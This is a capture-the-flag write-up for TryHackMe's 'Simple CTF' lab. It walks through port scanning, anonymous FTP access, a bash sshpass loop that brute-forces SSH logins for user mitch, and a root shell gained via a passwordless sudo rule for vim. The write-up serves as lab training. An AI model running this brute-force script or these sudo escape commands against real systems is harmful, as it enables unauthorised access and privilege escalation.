# Simple CTF [EASY] Writeup - TryHackMe

Files used in this blog are [here](https://github.com/jd-apprentice/try-hack-me/tree/master/machines/simple_ctf)

## Port scan 🔍

First we scan all TCP ports on the target:

```bash
nmap -p- -T4 --min-rate 5000 -vvv -o fullscan 10.10.226.232
```

- `-p-` scans all 65535 TCP ports
- `-T4` selects the aggressive timing template
- `--min-rate 5000` forces nmap to send at least 5000 packets per second; it makes the full-port scan fast, but on a slow VPN link replies can get lost, so a port reported as filtered is worth re-checking at a lower rate
- `-vvv` is verbose
- `-o fullscan` writes the normal-format report to the file `fullscan` (the documented spelling is `-oN fullscan`)

```
# Nmap 7.80 scan initiated Fri Feb 16 00:10:54 2024 as: nmap -p- -T4 --min-rate 5000 -vvv -o fullscan 10.10.226.232
Nmap scan report for 10.10.226.232 (10.10.226.232)
Host is up, received syn-ack (0.27s latency).
Scanned at 2024-02-16 00:10:54 -03 for 42s
Not shown: 65532 filtered ports
Reason: 65532 no-responses
PORT     STATE SERVICE      REASON
21/tcp   open  ftp          syn-ack
80/tcp   open  http         syn-ack
2222/tcp open  EtherNetIP-1 syn-ack

Read data files from: /usr/bin/../share/nmap
# Nmap done at Fri Feb 16 00:11:36 2024 -- 1 IP address (1 host up) scanned in 41.57 seconds
```
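The SERVICE column in a plain SYN scan is only the name registered for that port number in nmap's services table, not a detection: `EtherNetIP-1` on 2222 is what the table says, while the rest of this writeup shows the port is actually SSH. The sensible next step is a version scan limited to the ports that answered, e.g. `nmap -sV -sC -p 21,80,2222 10.10.226.232`. The snippet below is an added example, not part of the original writeup: it pulls that port list out of the `-oN` file so the follow-up command does not have to be typed by hand. The scan text is embedded so it runs offline, and the `fullscan` filename is the one used above.

```shell
#!/bin/bash
# Added example, not from the original writeup: extract the open TCP ports from an
# nmap normal-output (-oN) file so the follow-up version scan targets only them.

# open_ports <file> -> comma-separated list of open TCP ports, in file order
open_ports() {
    # Match only "PORT/tcp open ..." rows; skip the header and closed/filtered rows.
    awk '/^[0-9]+\/tcp +open / {
             split($1, f, "/")
             ports = ports (ports == "" ? "" : ",") f[1]
         }
         END { print ports }' "$1"
}

# Assumption: the real scan is saved as ./fullscan. Here the writeup's scan is written
# to a temporary file instead so the example is self-contained.
sample=$(mktemp)
cat > "$sample" <<'EOF'
# Nmap 7.80 scan initiated Fri Feb 16 00:10:54 2024 as: nmap -p- -T4 --min-rate 5000 -vvv -o fullscan 10.10.226.232
Nmap scan report for 10.10.226.232 (10.10.226.232)
Host is up, received syn-ack (0.27s latency).
Not shown: 65532 filtered ports
PORT     STATE SERVICE      REASON
21/tcp   open  ftp          syn-ack
80/tcp   open  http         syn-ack
2222/tcp open  EtherNetIP-1 syn-ack
# Nmap done at Fri Feb 16 00:11:36 2024 -- 1 IP address (1 host up) scanned in 41.57 seconds
EOF

ports=$(open_ports "$sample")
echo "Open ports: $ports"
# The SERVICE column is a name lookup, not a detection (2222 is really SSH here),
# so confirm with a version scan limited to the ports that answered:
echo "Next: nmap -sV -sC -p $ports 10.10.226.232"
rm -f "$sample"
```

With the writeup's scan as input the function prints `21,80,2222`; closed or filtered rows are ignored because the pattern requires the literal state `open`.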

## FTP Anonymous login 🤿

Now that we know port 21 is open, we can try an anonymous login (the banner identifies the server as vsFTPd 3.0.3):

```shell
ftp 10.10.226.232
Connected to 10.10.226.232.
220 (vsFTPd 3.0.3)
Name (10.10.226.232:user): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
```

Now we are in! We can verify by listing the directory with `ls`:

```shell
ftp> ls
200 EPRT command successful. Consider using EPSV.
150 Here comes the directory listing.
drwxr-xr-x    2 ftp      ftp          4096 Aug 17  2019 pub
226 Directory send OK.
ftp>
```

The `200 EPRT command successful` line shows the client opened the data connection in active mode. If `ls` hangs instead, type `passive` to toggle passive mode, where the client connects out to the server for data transfers; that works through VPNs and NAT where active mode does not.

Inside `pub` there is a file called `ForMitch.txt`. Change into the directory with `cd pub`, download the file with `get ForMitch.txt`, and leave with `bye`.

Back on our machine, `cat ForMitch.txt` gives the following:
```
Dammit man... you'te the worst dev i've seen. You set the same pass for the system user, and the password is so weak... i cracked it in seconds. Gosh... what a mess!
```

## Brute force 👊

So the note tells us the developer reused one weak password for his system account as well.

The message itself names no one, but the file is addressed to Mitch, so we assume the username is `mitch` and brute force his password over SSH on port 2222, the third port from the scan.

I'm going to use a package called `sshpass` to send each password from a wordlist I got from the internet, with a simple script like this:

```bash
#!/bin/bash
# Feed each password from the wordlist to ssh via sshpass. ssh just runs `true`
# and exits, so a zero exit status means the credentials were accepted.
while IFS= read -r password; do
    echo "Trying password: $password"
    if sshpass -p "$password" ssh -p 2222 -o StrictHostKeyChecking=no \
           -o PreferredAuthentications=password -o PubkeyAuthentication=no \
           -o ConnectTimeout=10 mitch@10.10.226.232 true 2>/dev/null; then
        echo "Valid password for mitch: $password"
        break
    fi
done < weak_passwords.txt
```

After a long time trying I got the password!

![img](https://cdn.discordapp.com/attachments/875262629516546089/1207900279333199892/image.png?ex=65e153cc&is=65cedecc&hm=f10e079c83ce76d0ef103f93239475bac703dfa0bb84abfb9b4890f60a8db799&)

## Obtain the flags 🏁

Once logged in as `mitch`, `ls` shows `user.txt` in the home directory; read it with `cat user.txt` and continue.

One of the first things to do on any system (even before running tools like linpeas) is a simple `sudo -l`, which lists the commands the current user may run through sudo and whether they require a password.

```shell
$ sudo -l
User mitch may run the following commands on Machine:
    (root) NOPASSWD: /usr/bin/vim
```
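Reading one rule like the `sudo -l` output above is easy by eye; on a host with a long list it helps to have something flag the entries that matter. The snippet below is an added example, not part of the original writeup: it parses `sudo -l` output and prints the commands whose binary is known (per GTFOBins) to spawn a shell or read arbitrary files when run as root. The list of binaries is an assumption for illustration, and the sample input is the output shown above plus one extra harmless rule for contrast.

```shell
#!/bin/bash
# Added example, not from the original writeup: triage `sudo -l` output for commands
# that GTFOBins documents as able to spawn a shell or read files as root.
# The list below is an assumption for illustration; extend it from gtfobins.github.io.
SHELL_ESCAPE_BINS="vim vi view nano less more man awk find python python3 perl env bash sh"

# sudo_rules <sudo -l output> -> one allowed command per line, with the "(user)" part
# and tags such as NOPASSWD:/SETENV: stripped. Rule lines look like
#   "(root) NOPASSWD: /usr/bin/vim"   or   "(ALL : ALL) ALL"
sudo_rules() {
    printf '%s\n' "$1" \
      | grep -E '^[[:space:]]*\(' \
      | sed -E 's/^[[:space:]]*\([^)]*\)[[:space:]]*//; s/^([A-Z]+:[[:space:]]*)+//' \
      | tr ',' '\n' \
      | sed -E 's/^[[:space:]]+//; s/[[:space:]]+$//'
}

# sudo_shell_escapes <sudo -l output> -> the commands worth trying first, one per line
sudo_shell_escapes() {
    sudo_rules "$1" | while IFS= read -r cmd; do
        [ -z "$cmd" ] && continue
        if [ "$cmd" = "ALL" ]; then
            printf '%s\n' "ALL (any command as that user)"
            continue
        fi
        # Compare the basename of the first word, so "/usr/bin/vim" and
        # "/usr/bin/vim /etc/motd" both count as "vim".
        first=${cmd%% *}
        base=${first##*/}
        for b in $SHELL_ESCAPE_BINS; do
            if [ "$base" = "$b" ]; then
                printf '%s\n' "$cmd"
                break
            fi
        done
    done
}

# Constructed sample: the output from this writeup plus one extra rule that is not interesting.
SAMPLE='User mitch may run the following commands on Machine:
    (root) NOPASSWD: /usr/bin/vim
    (root) NOPASSWD: /usr/bin/id'

sudo_shell_escapes "$SAMPLE"
# -> /usr/bin/vim
```

On the sample it prints only `/usr/bin/vim`; `/usr/bin/id` is dropped because `id` cannot be turned into a shell. An `ALL` rule is reported as such, since it needs no escape trick at all.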
And of course there it is: `vim` can be run as root without a password. vim can execute shell commands from inside the editor with `:!<command>`, and under `sudo` each of those commands runs as root.

So we run `sudo vim`, type `:!ls /root` and press Enter to check whether the root flag is there.

![img](https://cdn.discordapp.com/attachments/875262629516546089/1207904023848681492/image.png?ex=65e15749&is=65cee249&hm=cc9c11435367658b1909cbcd34d61c2c217c1466165f4555d13152167076fcf5&)

```shell
$ sudo vim
:!ls /root

root.txt
```
And there it is! Same again, this time with `:!cat /root/root.txt`. Nothing limits this to single commands: `:!/bin/bash` (or `:shell`) drops you into an interactive root shell, and `sudo vim -c ':!/bin/bash'` does the same without ever touching the editor, which is why a NOPASSWD rule for an editor is effectively a NOPASSWD rule for everything.

![img](https://cdn.discordapp.com/attachments/875262629516546089/1207904509829971980/image.png?ex=65e157bc&is=65cee2bc&hm=353a242df153233f154100e3f5760595cf9629bf4fa718cb2d44ea7f6501b1c3&)

Congratulations you got your flag!
